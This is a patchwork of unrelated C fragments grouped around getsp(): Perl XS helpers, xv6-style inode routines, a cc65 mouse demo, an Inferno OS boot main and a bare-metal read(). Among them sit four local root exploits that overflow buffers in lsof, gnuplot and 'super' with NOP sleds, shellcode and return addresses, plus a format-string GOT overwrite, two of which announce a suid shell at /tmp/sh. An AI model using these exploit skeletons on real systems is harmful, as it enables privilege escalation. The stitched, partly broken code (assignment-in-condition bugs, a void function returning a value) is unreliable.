void finish_call_state() {
SV **&sp = getsp();
PUTBACK;
FREETMPS;
LEAVE;
}
main ( int argc, char *argv[0]) {
char b00m[220];
long addr;
int x, y, offset=380;
if (argc > 1) offset = atoi(argv[1]);
for (x = 0; x < 16; x++)
b00m[x] = 'A';
addr = getsp() + offset;
printf ( "SDI-lsof exploiting at 0x%x\n", addr);
b00m[x++] = addr & 0x000000ff;
b00m[x++] = (addr & 0x0000ff00) >> 8;
b00m[x++] = (addr & 0x00ff0000) >> 16;
b00m[x++] = (addr & 0xff000000) >> 24;
for ( ; x < 100; x++)
b00m[x] = 0x90;
for (y = 0; y < strlen(shellcode); y++, x++)
b00m[x] = shellcode[y];
b00m[strlen(b00m)] = '\0';
printf ( "\nFind a suid shell at /tmp/sh...\n\n");
execl ( PATH, PATH, "-u", b00m, (char *)0);
perror ( "execl") ;
}
/* write changes back to disk if nessary. */
void iupdate(struct inode *ip){
struct super *sp;
struct d_inode *itab;
struct buf *bp;
uint lba;
/*
if ((ip->i_flag & I_DIRTY)==0){
return;
}
*/
sp = getsp(ip->i_dev);
if (sp==NULL){
panic("bad super");
}
// get the blk number where this inode lies in.
bp = bread(ip->i_dev, IBLK(sp, ip->i_num));
if (bp->b_flag & B_ERROR) {
panic("error on reading an inode");
}
itab = (struct d_inode*)bp->b_data;
// which different from above.
memcpy(&itab[(ip->i_num-1)%IPB], ip, sizeof(struct d_inode));
ip->i_flag &= ~I_DIRTY;
bwrite(bp);
brelse(bp);
return 0;
}
char *col(int n,char *p) {
p=nonsp(p);
while(n>0) {
p=nonsp(getsp(p));
n--;
}
return p;
}
void main(int argc, char *argv[]) {
char *buf, *ret;
long *addrp, addr;
int bufsiz, offset;
int i;
bufsiz=DEFAULT_BUFSIZ;
offset=DEFAULT_OFFSET;
if (argc = 2) bufsiz = atoi(argv[1]);
if (argc = 3) offset = atoi(argv[2]);
buf=malloc(bufsiz);
addr = getsp() - offset;
printf("address: 0x%x\n", addr);
printf("bufsize: %d\n", bufsiz);
printf("offset : %d\n", offset);
ret = buf;
addrp = (long *) ret;
for (i = 0; i < bufsiz; i+=4)
*(addrp++) = addr;
memset(buf, NOP, (strlen(shellcode)/2));
ret = buf + ((bufsiz/2) - (strlen(shellcode)/2));
for (i = 0; i < strlen(shellcode); i++)
*(ret++) = shellcode[i];
buf[bufsiz - 1] = '\0';
memcpy(buf,"HOME=", 5);
setenv("HOME", buf, 1);
execvp("/usr/bin/gnuplot", NULL);
} ---snip---
int main(int argc, char **argv) {
long GOT;
long RET;
int ALIGN = 2, off = 0, opt;
char *av[3], *ev[2];
char *hack, buff[100];
hack = (char *)malloc(2000);
sprintf(hack, "HACK=");
if ( argc < 4 ) { usage(); exit(0); }
while ((opt = getopt(argc, argv, "o:g:")) != -1)
{
switch (opt) {
case 'o':
off = atoi(optarg);
break;
case 'g':
sscanf(optarg, "0x%x", &GOT);
break;
default:
usage();
}
}
memset(hack + 5, 0x90, 1000-1-strlen(shellcode));
sprintf(hack + 1000 - strlen(shellcode), "%s", shellcode);
RET = getsp()+off;
printf("\nUsing: retaddr = 0x%x, GOT = 0x%x, OFFSET = %d\n\n", RET, GOT, off);
memset(buff,0x00,sizeof(buf));
sprintf(buff,"%s",fmt_str_creator(GOT+4,RET,ALIGN));
av[0] = BIN;
av[1] = buff;
av[2] = 0;
ev[0] = hack;
ev[1] = 0;
execve(*av, av, ev);
return 0;
}
/* load a inode from disk
* */
int iload(struct inode *ip){
struct super *sp;
struct d_inode *itab; /* note this is an d_inode, 32 bytes. */
struct buf *bp;
uint lba;
sp = getsp(ip->i_dev);
if (sp==NULL){
panic("error on reading a super");
}
// get the blk number where this inode lies in.
bp = bread(ip->i_dev, IBLK(sp, ip->i_num));
if (bp->b_flag & B_ERROR) {
panic("error on reading an inode");
}
itab = (struct d_inode*)bp->b_data;
memcpy(ip, &itab[(ip->i_num-1)%IPB], sizeof(struct d_inode));
brelse(bp);
return 0;
}
main ( int argc, char *argv[] ) {
char itamar[2040]; // ta mar mesmo
long addr;
int x, y, offset = 1000, align=0;
if ( argc > 1) offset = atoi(argv[1]);
addr = getsp() + offset;
for ( x = 0; x < (1410-strlen(shellcode)); x++)
itamar[x] = 0x90;
for ( ; y < strlen(shellcode); x++, y++)
itamar[x] = shellcode[y];
for ( ; x < 1500; x+=4) {
itamar[x ] = (addr & 0xff000000) >> 24;
itamar[x+1] = (addr & 0x000000ff);
itamar[x+2] = (addr & 0x0000ff00) >> 8;
itamar[x+3] = (addr & 0x00ff0000) >> 16;
}
itamar[x++] = '\0';
printf ( "\nwargames at 0x%x, offset %d\n", addr, offset);
printf ( "Look for a suid shell root owned at /tmp/sh\n");
execl ( "/usr/local/bin/super", "super", "-T",itamar, (char *) 0);
}
void prepare_call_state() {
SV **&sp = getsp();
ENTER;
SAVETMPS;
}
int main (void)
#endif
{
struct mouse_info info;
struct mouse_box full_box, small_box;
unsigned char width, height;
char C;
bool Invisible = true, Done = false, Jailed = false;
#ifdef __ATARIXL__
cprintf ("adding heap: $%04X bytes at $%04X\r\n",
&_HIDDEN_RAM_SIZE__ - (&_HIDDEN_RAM_LAST__ - &_HIDDEN_RAM_START__),
&_HIDDEN_RAM_LAST__);
_heapadd (&_HIDDEN_RAM_LAST__, (size_t)(&_HIDDEN_RAM_SIZE__ - (&_HIDDEN_RAM_LAST__ - &_HIDDEN_RAM_START__)));
cgetc ();
#endif
#ifndef NO_DEBUG
/* Initialize the debugger */
DbgInit (0);
#endif
/* Set dark-on-light colors. Clear the screen. */
#ifdef __CBM__
(void) bordercolor (COLOR_GRAY2);
(void) bgcolor (COLOR_WHITE);
(void) textcolor (COLOR_GRAY1);
#else
(void) bordercolor (COLOR_BLUE);
(void) bgcolor (COLOR_WHITE);
(void) textcolor (COLOR_BLACK);
#endif
cursor (0);
clrscr ();
/* If a lightpen driver is installed, then it can get a calibration value
** from this file (if it exists). Or, the user can adjust the pen; and,
** the value will be put into this file, for the next time.
** (Other drivers will ignore this.)
*/
#if defined(__C64__) || defined(__C128__) || defined(__CBM510__)
pen_adjust ("pen.dat");
#endif
#if DYN_DRV
/* If a dynamically loadable driver is named on the command line,
** then use that driver instead of the standard one.
*/
if (argc > 1) {
mouse_name = argv[1];
} else {
#if defined(__ATARI__) || defined(__C64__) || defined(__C128__)
char selection, flag = 0;
cprintf ("Select mouse driver:\r\n"
" 0 - Joystick\r\n"
#ifdef __ATARI__
" 1 - ST Mouse\r\n"
" 2 - Amiga Mouse\r\n"
" 3 - Atari Trakball\r\n"
" 4 - Atari TouchPad\r\n"
#else
" 1 - 1351 Mouse\r\n"
" 2 - Inkwell Mouse\r\n"
" 3 - Paddle\r\n"
#endif
"Enter selection: ");
while (1) {
switch (selection = cgetc ()) {
case '0': mouse_name = MSENAME_0; flag = 1; break;
case '1': mouse_name = MSENAME_1; flag = 1; break;
case '2': mouse_name = MSENAME_2; flag = 1; break;
case '3': mouse_name = MSENAME_3; flag = 1; break;
#ifdef __ATARI__
case '4': mouse_name = MSENAME_4; flag = 1; break;
#endif
}
if (flag) break;
}
cprintf ("%c\r\nOK, loading \"%s\",\r\nplease wait patiently...\r\n", selection, mouse_name);
#else
/* Output a warning about the standard driver that is needed. */
DoWarning ();
mouse_name = mouse_stddrv;
#endif
}
/* Load and install the driver. */
CheckError ("mouse_load_driver",
mouse_load_driver (&MOUSE_CALLBACK, mouse_name));
#else /* not DYN_DRV */
#if !defined(MOUSE_DRIVER) && (defined(__ATARI__) || defined(__C64__) || defined(__C128__))
{
char selection, flag = 0;
cprintf ("Select mouse driver:\r\n"
" 0 - Joystick\r\n"
#ifdef __ATARI__
" 1 - ST Mouse\r\n"
" 2 - Amiga Mouse\r\n"
" 3 - Atari Trakball\r\n"
" 4 - Atari TouchPad\r\n"
#else
" 1 - 1351 Mouse\r\n"
" 2 - Inkwell Mouse\r\n"
" 3 - Paddle\r\n"
#endif
"Enter selection: ");
while (1) {
switch (selection = cgetc ()) {
case '0': mouse_drv_use = MSESTAT_0; flag = 1; break;
case '1': mouse_drv_use = MSESTAT_1; flag = 1; break;
case '2': mouse_drv_use = MSESTAT_2; flag = 1; break;
case '3': mouse_drv_use = MSESTAT_3; flag = 1; break;
#ifdef __ATARI__
case '4': mouse_drv_use = MSESTAT_4; flag = 1; break;
#endif
}
if (flag) break;
}
}
#else
mouse_drv_use = mouse_static_stddrv;
#endif
/* Install the driver. */
CheckError ("mouse_install",
mouse_install (&MOUSE_CALLBACK,
# ifdef MOUSE_DRIVER
MOUSE_DRIVER
# else
#if defined(__ATARI__) || defined(__C64__) || defined(__C128__)
mouse_drv_use
#else
mouse_static_stddrv
#endif
# endif
));
#endif
#ifndef NO_JAIL
/* Get the initial bounding box. */
mouse_getbox (&full_box);
#endif
screensize (&width, &height);
top:
clrscr ();
/* Print a help line */
cputs (" d)ebug h)ide q)uit s)how j)ail");
gotoxy (1, 20);
cprintf ("SP: $%04X", getsp());
/* Put a cross at the center of the screen. */
gotoxy (width / 2 - 3, height / 2 - 1);
#if defined(__CBM__)
cprintf ("%3u,%3u\r\n%*s\xDB", width / 2 * 8 + 4, height / 2 * 8 + 4,
width / 2, "");
#else
cprintf ("%3u,%3u\r\n%*s+", width / 2 * 8 + 4, height / 2 * 8 + 4,
width / 2, "");
#endif
/* Test loop */
ShowState (Jailed, Invisible);
do {
/* Get the current co-ordinates and button states; and, print them. */
mouse_info (&info);
gotoxy (0, 2);
cprintf (" X = %3d\r\n", info.pos.x);
cprintf (" Y = %3d\r\n", info.pos.y);
cprintf (" B1 = %c\r\n", (info.buttons & MOUSE_BTN_LEFT) ?
#ifdef __CBM__
0x5F
#else
'v'
#endif
: '^');
cprintf (" B2 = %c", (info.buttons & MOUSE_BTN_RIGHT) ?
#ifdef __CBM__
0x5F
#else
'v'
#endif
: '^');
/* Handle user input */
if (kbhit ()) {
cclearxy (1, 9, 23);
switch (tolower (C = cgetc ())) {
#ifndef NO_DEBUG
case 'd':
BREAK();
/* The debugger might have changed the colors.
** Restore them.
*/
#ifdef __CBM__
(void) bordercolor (COLOR_GRAY2);
(void) bgcolor (COLOR_WHITE);
(void) textcolor (COLOR_GRAY1);
#else
(void) bordercolor (COLOR_BLUE);
(void) bgcolor (COLOR_WHITE);
(void) textcolor (COLOR_BLACK);
#endif
/* The debugger changed the screen; restore it. */
goto top;
#endif
case 'h':
mouse_hide ();
ShowState (Jailed, ++Invisible);
break;
#ifndef NO_JAIL
case 'j':
if (Jailed) {
mouse_setbox (&full_box);
Jailed = false;
} else {
small_box.minx = max (info.pos.x - 10, full_box.minx);
small_box.miny = max (info.pos.y - 10, full_box.miny);
small_box.maxx = min (info.pos.x + 10, full_box.maxx);
small_box.maxy = min (info.pos.y + 10, full_box.maxy);
mouse_setbox (&small_box);
Jailed = true;
}
ShowState (Jailed, Invisible);
break;
#endif
case 's':
mouse_show ();
if (Invisible) {
ShowState (Jailed, --Invisible);
}
break;
case 'q':
Done = true;
break;
default:
gotoxy (1, 9);
cprintf ("Spurious character: $%02X", C);
}
}
} while (!Done);
#if DYN_DRV
/* Uninstall and unload the driver. */
CheckError ("mouse_unload", mouse_unload ());
#else
/* Uninstall the static driver. */
CheckError ("mouse_uninstall", mouse_uninstall ());
#endif
/* Say goodbye */
cputsxy (0, height / 2 + 3, "Goodbye!");
return EXIT_SUCCESS;
}
void
main() {
uint j=0,i=0,k=0;
uint rev;
ulong pc;
pc = getpc();
pl011_addr((void *)pc, 1);
pl011_puts("Entered main() at ");
pl011_addr(&main, 0);
pl011_puts(" with SP=");
pl011_addr((void *)getsp(), 0);
pl011_puts(" with SC=");
pl011_addr((void *)getsc(), 0);
pl011_puts(" with CPSR=");
pl011_addr((void *)getcpsr(), 0);
pl011_puts(" with SPSR=");
pl011_addr((void *)getspsr(), 1);
pl011_puts("Clearing Mach: ");
memset(m, 0, sizeof(Mach));
pl011_addr((char *)m, 0); pl011_puts("-");
pl011_addr((char *)(m+1), 1);
pl011_puts("Clearing edata: ");
memset(edata, 0, end-edata);
pl011_addr((char *)&edata, 0); pl011_puts("-");
pl011_addr((char *)&end, 1);
conf.nmach = 1;
quotefmtinstall();
confinit();
mmuinit1();
xinit();
poolinit();
poolsizeinit();
//uartconsinit();
screeninit();
trapinit();
timersinit();
clockinit();
printinit();
swcursorinit();
rev = getfirmware();
print("\nARM %ld MHz id %8.8lux firmware: rev %d, mem: %ld\n"
,(m->cpuhz+500000)/1000000, getcpuid(), rev, conf.topofmem/MB);
print("Inferno OS %s Vita Nuova\n", VERSION);
print("Ported to Raspberry Pi (BCM2835) by LynxLine\n\n");
procinit();
links();
chandevreset();
eve = strdup("inferno");
userinit();
schedinit();
pl011_puts("to inifinite loop\n\n");
for (;;);
}
ssize_t read(int fd, void *buf, size_t count)
{
/*
* Define & initialize variables.
* Currentsp save SVC sp
* Readcount is initialized with -1
* because the first of buf[] start with buf[0].
* charbuf in local copy of buf.
*/
int unsigned currentsp = getsp();
char ch;
ssize_t readcount = -1;
char *charbuf=(char *)buf;
/*
* Return -DBADF if not from stdin
*/
if (fd != STDIN_FILENO)
return -EBADF;
/*
* Return -EFAULT when:
* 1. read more then 64MB buffer size
* 2. read can not exceed heap or free
*/
if
(
count > buffersize ||
(
!(
(
((char *)charbuf + count) < ((char *)currentsp) &&
((char *)charbuf) >= ((char *)heapbtm)
)
||
(
((char *)charbuf + count) <= ((char *)freetop) &&
((char *)charbuf) >= ((char *)freebtm)
)
)
)
)
return -EFAULT;
/*
* read in the string
*/
while(1)
{
ch = (char)getc();
/*
* Return immediately when EOT
*/
if (ch == EOT) //EOT
{
return (readcount + 1);
}
/*
* Print "\b \b" when backspace
*/
else if (ch == backspace)
{
if(readcount >= 0)
{
charbuf[readcount] = 0;
readcount -= 1;
putc('\b');
putc(' ');
putc('\b');
}
}
/*
* Return when a newline or carriage return
*/
else if( ch == '\n' || ch == '\r')
{
if ((readcount+1)<(ssize_t)count)
{
readcount += 1;
charbuf[readcount]='\n';
putc('\n');
return (readcount+1);
}
else
return (readcount+1);
}
/*
* Read the char into the buf
*/
else
{
if ((readcount+1)<(ssize_t)count)
{
readcount += 1;
charbuf[readcount] = ch;
putc(ch);
}
else
return (readcount + 1);
}
}
}
